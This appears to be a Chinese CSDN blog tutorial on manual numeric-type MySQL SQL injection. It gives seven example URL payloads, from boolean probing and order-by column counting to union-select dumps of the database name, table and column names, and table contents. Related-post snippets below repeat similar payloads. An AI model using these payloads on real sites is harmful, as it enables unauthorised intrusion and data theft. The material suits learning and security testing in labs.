MySQL数字型注入

最新推荐文章于 2024-03-29 16:48:00 发布
最新推荐文章于 2024-03-29 16:48:00 发布
阅读量180 收藏
点赞数
分类专栏: web安全 文章标签: mysql 数据库 php sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fdhdgsdfdsa/article/details/114383054
版权

准备知识
sql的增删改查命令(其中and & or(运算符)、order by(排序)、union(合并语句操作符)是重点)

  1. 判断是否存在漏洞
    用and 1=1和and 1=2来验证判断,如:
    http://www.xxx.com/sqli/01.php?id=1 and 1=1
    返回数据,说明执行成功
    http://www.xxx.com/sqli/01.php?id=1 and 1=2
    不返回数据,说明数据库后台报错了

  2. 用排序间接查找出所有列(专业说法SQL中叫字段)
    用order by 来根据字段所在列排序间接查找出有多少个字段(列),如:
    http://www.xxx.com/sqli/01.php?id=1 order by 3

  3. 用合并语句查询,并把自定义数字/字符来占位显示,需让自带表达式报错才能显示出自定义数字/字符,如:
    http://www.xxx.com/1.php?id=1 and 1=2 union select 1,2,3

  4. 找出当前表的数据库名,如:
    http://www.xxx.com/1.php?id=1 and 1=2 union select 1,database(),3

  5. 合并查询查出的数据库的所有表名,如:
    http://www.xxx.com/1.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

  6. 继续合并查询出当前表的所有字段(列名)如:
    http://www.xxx.com/1.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘news’

  7. 查询出字段下的数据,如:
    http://www.xxx.com/1.php?id=1 and 1=2 union select 1,group_concat(id,title,content),3 from news

fdhdgsdfdsa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
mysql注入
02-07
mysql注入是个严重的安全问题,这个是简单的PHP配合mysql注入
17.注入篇————MYSQL数字型注入
Fly_鹏程万里
03-01 2242
MYSQL数字型注入流程:(1)找注入参数:http://xx.xx.xx.xx:xxxx/?id=1 http://xx.xx.xx.xx:xxxx/?id=1 and 1=1 #显示正常 http://xx.xx.xx.xx:xxxx/?id=1 and 1=2 #显示不正常(2)猜字段(个数为3)http://xx.xx.xx.xx:xxxx/?id=1 or...
sql注入(整数型注入
最新发布
2401_82760239的博客
03-29 857
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
mysql 数字注入_SQL数字型注入(mysql数据库)
weixin_33196555的博客
01-19 552
好像并没有什么特别的东西。用工具进行全站扫描,查看是否有其他页面存在。结果我们一共扫出了三个页面,一个静态页面,两个动态页面。排除静态页面,login.php是我们刚刚看见的后台登陆页面,我们打开这个new_list.php看看。结果我们可以发现,一片空白,也就是说我们在向服务器请求获取页面的时候,页面没有获取成功,也就是差参数。盲猜试试id=1,这个时候发现页面正常显示了。猜测该注入数字型的注...
mysql 数字注入_Mysql数字型手工注入
weixin_39584549的博客
01-19 166
本文纯粹整理以前的旧笔记整理出来的文章,将简单粗暴的记录Mysql常用各类型注入漏洞的利用和验证方法。01数字型注入_注入点确定一个常见的查询功能页面测试 查看PHP源码的核心代码????解释:红色箭头的id就是post请求包里面取参参数黄色部分就是传入数据库的查询语句 明显传入参数完全没有做过滤当加入一个特殊字符进行查询的时候,Mysql查询语句会变成这样selectusername,emailf...
MySQL联合注入数字型注入
m0_50211409的博客
03-26 588
SQL注入原理 SQL注入攻击是网站未对sql语句,完全校验通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。一切与数据库存在交互的地方都是有可能存在注入漏洞的。 这难度程度是比较简单的,但是需要一些SQL语句基础。 测试环境:东塔靶场 https://labs.do-ta.com/index/course/detail/id/51 测试工具:hackebay 1.判断是否存在注入 我们可以在url的id=1后添加一个单引号(‘)执行,看语句是否会带入查询 如
PHP MYSQL注入攻击需要预防7个要点
12-15
1:数字型参数使用类似intval,floatval这样的方法强制过滤。 2:字符串型参数使用类似mysql_real_escape_string这样的方法强制过滤,而不是简单的addslashes。 3:最好抛弃mysql_query这样的拼接SQL查询方式,尽...
MySQLDBA运维笔记.pdf
11-04
mysql 总结........................................................................................................................................6 1.1 数据库的种类.......................................
PHPMySQL Web开发第4版
08-13
16.2.4 恶意代码注入 16.2.5 服务器被攻破 16.3了解与我们“打交道”的用户 16.3.1 破解人员 16.3.2 受影响机器的未知情用户 16.3.3 对公司不满的员工 16.3.4 硬件被盗 16.3.5 我们自身 16.4 代码的安全性 16.4.1 ...
PHPMySQL Web开发第4版pdf以及源码
10-13
16.2.4 恶意代码注入 16.2.5 服务器被攻破 16.3了解与我们“打交道”的用户 16.3.1 破解人员 16.3.2 受影响机器的未知情用户 16.3.3 对公司不满的员工 16.3.4 硬件被盗 16.3.5 我们自身 16.4 代码的安全性 16.4.1 ...
PHPMySQL WEB开发(第4版)
05-31
16.2.4 恶意代码注入 16.2.5 服务器被攻破 16.3了解与我们“打交道”的用户 16.3.1 破解人员 16.3.2 受影响机器的未知情用户 16.3.3 对公司不满的员工 16.3.4 硬件被盗 16.3.5 我们自身 16.4 代码的安全性 16.4.1 ...
SQL注入数字型
Vi_vids的博客
10-20 1888
基本漏洞篇 SQL注入数字型SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息 本章描述的数字型即是注入点为数字,采用GET方式 //sql_num.php <?php $conn = mysql_connect('localhost:3306','root','123456')or die('bad!'); //$conn定义一个名字为conn的变量 //使用账号root密码123456 去连接localhost这个mysql服务 mysql_query("SET NAMES
mysql 数值型注入_Mysql基本注入
weixin_28995139的博客
01-18 180
实验环境:墨者学院Mysql手工注入漏洞测试靶场后台源码没有进行任何字符过滤。首先进入靶场环境先用admin登陆试试果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅看到这里链接上有id = 1,怀疑这里会有注入点。判断注入点先简单判断是不是字符型注入点,使用单引号闭合语句,注释后面的语句?id = 1'--+发现页面有异常,可能不是字符型,再试试数字型注入?id = 1 and 1 =...
重现pikachu sql数字型字符型注入(作业)
qq_43473164的博客
03-24 1014
重现pikachu sql数字型字符型注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
SQL数字型注入
gl620321的博客
08-10 366
一、SQL注入问题的审计 SQL攻击(SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。 简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序中忽略了检查,那么这些注入进去的指令就会被数据库服务器认为是正常的SQL指令而运行,因此遭到破坏。 而数字型注入一般不用考虑到引号的问题了 这个函数的功能就是将我们输入的字符进行查找替换 转化 第6行任意注入...
SQL注入数字型注入
PatrickStar131的博客
08-23 278
用到piakchu靶场,burp抓包 进入靶场页面 通过提交查询得知由变量id来输出 然后进行抓包 找出输入的数字进行SQL语句拼接 id=1&submit=%E6%9F%A5%E8%AF%A2 union select username,password from users id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2 拼接后进行提交,此时靶场页面显示出...
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1464
SQL注入原理-数值型注入
sql注入--数字型
pakho_C的博客
01-01 2110
sql注入数字型 靶场:sqli-labs-master 下载链接:靶场下载链接 第二关php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connectio
SQL注入基础--数字型注入
qq_42988351的博客
04-02 7178
参考 参考学习链接 学习笔记–基础篇–sql注入数字型SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
mysql 注入扫描
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值